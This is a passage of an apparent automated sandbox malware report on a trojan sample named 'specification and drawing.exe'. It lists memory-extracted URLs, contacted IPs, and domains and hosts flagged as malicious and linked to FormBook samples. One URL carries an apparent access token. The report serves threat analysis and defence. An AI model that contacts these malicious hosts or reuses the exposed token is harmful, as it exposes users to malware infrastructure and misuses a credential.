                                                                  https://reg.ruwscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.rbc.ru/technology_and_media/wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.imena.ua/domainsLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.imena.ua/documentswscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://img.imena.ua/js/bundle.min.jswscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://inau.ua/wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.imena.ua/en/how-searchwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.imena.ua/vpsLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cacspecification and drawing.exefalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.ripe.net/wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.imena.ua/hostingLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.reg.ru/whois/?check=&dname=www.synd.fun&amp;reg_source=parking_autowscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.imena.ua/LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://parking.reg.ru/script/get_domain_data?domain_name=www.synd.fun&rand=wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.imena.ua/domains/priceswscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.imena.ua/uaLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://partner.mirohost.netwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.imena.ua/domains/premium-domainswscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.reg.ru/hosting/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_host&amp;wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.imena.ua/blog/LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namespecification and drawing.exe, 00000000.00000002.2178181816.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.imena.ua/datacenterwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://www.imena.ua/domains/regtmwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://www.reg.ru/domain/new/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_new&amwscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.imena.ua/how-searchwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.imena.ua/jobwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icowscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.imena.ua/contactLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.imena.ua/enLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.ix.net.ua/ruwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://img.imena.ua/css/media-set.csswscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://mail.mirohost.netwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://www.imena.ua/helpLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.ecosia.org/newtab/wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://control.imena.ua/login.php?lang=2wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://ac.ecosia.org/autocomplete?q=wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://control.mirohost.net/auth/login.php?lang=ruwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.imena.ua/ruLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.imena.ua/whois.php?domain=spectre.centerLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://companies.rbc.ru/wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.imena.ua/check-domainwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.imena.ua/paymentsLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.imena.ua/serversLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.nagasl89.babyLfvKCNKdvt.exe, 0000000A.00000002.4592454426.0000000004BF3000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.reg.ru/dedicated/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_server&wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://ogp.me/ns#wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.reg.ru/sozdanie-saita/wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.imena.ua/check-domain?step=transferwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://schema.org/OrganizationLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.imena.ua/support/domains-finance/sposoby-oplaty-uslug-imena-uaLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.imena.ua/support/domains-finance/icann-i-ee-funkciiwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs
                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        209.74.64.187
                                                                                                        www.jagdud.storeUnited States
                                                                                                        31744MULTIBAND-NEWHOPEUStrue
                                                                                                        67.223.117.169
                                                                                                        rtpsilva4d.clickUnited States
                                                                                                        15189VIMRO-AS15189UStrue
                                                                                                        162.159.140.104
                                                                                                        www.nagasl89.babyUnited States
                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                        185.106.176.204
                                                                                                        www.sidqwdf.funUnited Kingdom
                                                                                                        204212AS_LYREG3FRtrue
                                                                                                        47.238.157.253
                                                                                                        www.yun08ps.topUnited States
                                                                                                        20115CHARTER-20115UStrue
                                                                                                        194.58.112.174
                                                                                                        www.synd.funRussian Federation
                                                                                                        197695AS-REGRUtrue
                                                                                                        3.33.130.190
                                                                                                        swenansiansie.xyzUnited States
                                                                                                        8987AMAZONEXPANSIONGBtrue
                                                                                                        5.39.10.93
                                                                                                        www.spectre.centerFrance
                                                                                                        16276OVHFRtrue
                                                                                                        85.159.66.93
                                                                                                        natroredirect.natrocdn.comTurkey
                                                                                                        34619CIZGITRfalse
                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1566626
                                                                                                        Start date and time:2024-12-02 14:35:46 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 11m 17s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:11
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:2
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:specification and drawing.exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@10/7@15/9
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 75%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 92%
                                                                                                        • Number of executed functions: 100
                                                                                                        • Number of non-executed functions: 285
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                        • VT rate limit hit for: specification and drawing.exe
                                                                                                        TimeTypeDescription
                                                                                                        08:36:38API Interceptor2x Sleep call for process: specification and drawing.exe modified
                                                                                                        08:36:44API Interceptor13x Sleep call for process: powershell.exe modified
                                                                                                        08:37:43API Interceptor10277602x Sleep call for process: wscript.exe modified
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        209.74.64.187dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.jagdud.store/ohf8/
                                                                                                        En88bvC0fc.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.cotxot.info/tf3f/
                                                                                                        VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.techyes.life/rirk/
                                                                                                        New orde.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.selectox.xyz/b26r/
                                                                                                        Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.jagdud.store/qxse/
                                                                                                        BL.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.jagdud.store/qxse/
                                                                                                        rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.turnnex.online/dhzn/
                                                                                                        ROQ_972923.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.goldpal.xyz/ym9o/
                                                                                                        BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.jagdud.store/qxse/
                                                                                                        PO59458.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.cotxot.info/fqdb/
                                                                                                        67.223.117.169dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.rtpsilva4d.click/e61w/
                                                                                                        QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.rtpsilva4d.click/3x2e/
                                                                                                        PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.rtpsilva4d.click/zctj/
                                                                                                        PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.rtpsilva4d.click/zctj/
                                                                                                        185.106.176.204Tandemmernes90.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                        • www.sidqwdf.fun/e3ko/
                                                                                                        ORIGINAL INVOICE COAU7230734298.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.sidqwdf.fun/c6mm/
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        www.spectre.centerFcRCSylOMs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                        • 5.39.10.93
                                                                                                        2ULrUoVwTx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                        • 5.39.10.93
                                                                                                        VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 5.39.10.93
                                                                                                        PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 5.39.10.93
                                                                                                        rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                        • 5.39.10.93
                                                                                                        PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 5.39.10.93
                                                                                                        natroredirect.natrocdn.comCCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 85.159.66.93
                                                                                                        OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 85.159.66.93
                                                                                                        TNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                                                                        • 85.159.66.93
                                                                                                        OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 85.159.66.93
                                                                                                        REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 85.159.66.93
                                                                                                        Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 85.159.66.93
                                                                                                        Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 85.159.66.93
                                                                                                        packing list G25469.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 85.159.66.93
                                                                                                        purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 85.159.66.93
                                                                                                        Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 85.159.66.93
                                                                                                        www.nagasl89.baby56ck70s0BI.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 188.114.96.3
                                                                                                        p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 104.21.94.87
                                                                                                        TT Swift copy1.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 188.114.96.3
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        CLOUDFLARENETUSship's particulars-TBN.pdf.scr.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                        • 172.67.74.152
                                                                                                        https://ballynuts.gr//br/Get hashmaliciousUnknownBrowse
                                                                                                        • 104.18.11.207
                                                                                                        swift.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 104.21.67.152
                                                                                                        tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        Gastroptosis (5).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        HBL BLJ2T2411809005 & DAJKT2411000812.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 104.26.13.205
                                                                                                        Fonts.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 104.21.67.152
                                                                                                        New Order C0038 2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        MULTIBAND-NEWHOPEUSOrder MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 209.74.77.108
                                                                                                        specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                        • 209.74.77.107
                                                                                                        A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 209.74.77.109
                                                                                                        OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 209.74.77.107
                                                                                                        CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 209.74.77.108
                                                                                                        ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                        • 209.74.77.107
                                                                                                        Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                        • 209.74.77.108
                                                                                                        OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 209.74.77.107
                                                                                                        W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                        • 209.74.77.109
                                                                                                        FACTURA 24V70 VINS.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 209.74.64.190
                                                                                                        VIMRO-AS15189USdhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 67.223.117.169
                                                                                                        PO AT-5228.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 67.223.117.142
                                                                                                        shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 67.223.117.142
                                                                                                        fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 67.223.118.17
                                                                                                        New PO [FK4-7173].pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 67.223.117.142
                                                                                                        SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 67.223.117.142
                                                                                                        proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 67.223.117.142
                                                                                                        DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 67.223.117.142
                                                                                                        icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 67.223.118.17
                                                                                                        SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 67.223.117.142
                                                                                                        No context
                                                                                                        No context
                                                                                                        Process:C:\Users\user\Desktop\specification and drawing.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1216
                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
